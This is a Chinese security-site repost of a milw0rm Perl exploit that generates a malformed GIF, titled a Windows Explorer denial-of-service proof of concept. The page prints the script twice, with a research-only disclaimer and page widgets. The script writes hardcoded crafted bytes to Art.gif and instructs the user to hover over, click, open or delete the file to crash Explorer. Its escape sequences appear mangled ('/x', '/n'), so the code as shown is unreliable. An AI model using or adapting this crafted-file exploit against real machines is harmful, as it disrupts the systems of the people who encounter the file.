MS Windows Explorer.exe Gif Image Denial of Service Exploit 's

admin 2017年4月7日14:39:30评论271 views字数 2448阅读8分9秒阅读模式
摘要

来源:milw0rm
#!/usr/bin/perl
###############################################################
# Bug Found By ::DeltahackingTEAM
##
# Coded By Reza.Yavari (Dr.Pantagon)
##
#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com
##
#Free Upload :: Www.Persianupload.com And Www.Persianupload.net
##
#Email: Dr.Pantagon [A]Deltasecurity.ir
##
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem

print "/nGIF PoC denial of service exploit by Dr.Pantagon < [email protected]>";
print "/n/ngenerating Art.gif...";
print "/n/nUsage :";
print "/n/n1- Mouse Over Art.gif For Excute Exploit ";
print "/n/n2- Single Click Art.gif For Excute Exploit ";
print "/n/n3- Double Clik Art.gif (Open) For Excute Exploit ";
print "/n/n4- More... ";
print "/n/nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";
open(gif, ">./Art.gif") or die "cannot create gif file/n";
print gif "/x02/x00/x09/x00/x00/x03/x22/x00/x00/x00/x6/x7/x6/x6/x6/x64";
print gif "/x2D/x49/x07/x00/x00/x00/xFC/x02/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x08/x00/x00/x00/xFA/x02/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x07/x00/x00/x00/xFC/x02/x08/x00/x00/x00/x00/x00/x00/x80/x03/x00";
print gif "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x9b/x99/x86/xd1/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x95/x99/x99/x99/x99/x99/x99/x99/x98/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/xda/xd4/xdd/xb7/xdc/xc1/xdc/x99/x99/x99/x99/x99";
print gif "/x89/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x90/x90/x90/x90/x90/x90/x90/x90";
print gif "/x02/x00/x09/x00/x00/x03/x22/x00/x00/x00/x6/x7/x6/x6/x6/x64";
print gif "/x2D/x49/x07/x00/x00/x00/xFC/x02/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x08/x00/x00/x00/xFA/x02/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x07/x00/x00/x00/xFC/x02/x08/x00/x00/x00/x00/x00/x00/x80/x03/x00";
print gif "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";
close(gif);
print "ok/n/nok Gif Exploit Creat and run exploit and wait :)/n";

来源:milw0rm


#!/usr/bin/perl
###############################################################
# Bug Found By ::DeltahackingTEAM
##
# Coded By Reza.Yavari (Dr.Pantagon)
##
#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com
##
#Free Upload :: Www.Persianupload.com And Www.Persianupload.net
##
#Email: Dr.Pantagon [A]Deltasecurity.ir
##
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem

print "/nGIF PoC denial of service exploit by Dr.Pantagon < [email protected]>";
print "/n/ngenerating Art.gif...";
print "/n/nUsage :";
print "/n/n1- Mouse Over Art.gif For Excute Exploit ";
print "/n/n2- Single Click Art.gif For Excute Exploit ";
print "/n/n3- Double Clik Art.gif (Open) For Excute Exploit ";
print "/n/n4- More... ";
print "/n/nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";
open(gif, ">./Art.gif") or die "cannot create gif file/n";
print gif "/x02/x00/x09/x00/x00/x03/x22/x00/x00/x00/x6/x7/x6/x6/x6/x64";
print gif "/x2D/x49/x07/x00/x00/x00/xFC/x02/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x08/x00/x00/x00/xFA/x02/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x07/x00/x00/x00/xFC/x02/x08/x00/x00/x00/x00/x00/x00/x80/x03/x00";
print gif "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x9b/x99/x86/xd1/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x95/x99/x99/x99/x99/x99/x99/x99/x98/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/xda/xd4/xdd/xb7/xdc/xc1/xdc/x99/x99/x99/x99/x99";
print gif "/x89/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99";
print gif "/x99/x99/x99/x99/x99/x99/x90/x90/x90/x90/x90/x90/x90/x90";
print gif "/x02/x00/x09/x00/x00/x03/x22/x00/x00/x00/x6/x7/x6/x6/x6/x64";
print gif "/x2D/x49/x07/x00/x00/x00/xFC/x02/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x08/x00/x00/x00/xFA/x02/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";
print gif "/x07/x00/x00/x00/xFC/x02/x08/x00/x00/x00/x00/x00/x00/x80/x03/x00";
print gif "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";
close(gif);
print "ok/n/nok Gif Exploit Creat and run exploit and wait :)/n";

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月7日14:39:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MS Windows Explorer.exe Gif Image Denial of Service Exploit 'shttps://cn-sec.com/archives/46378.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息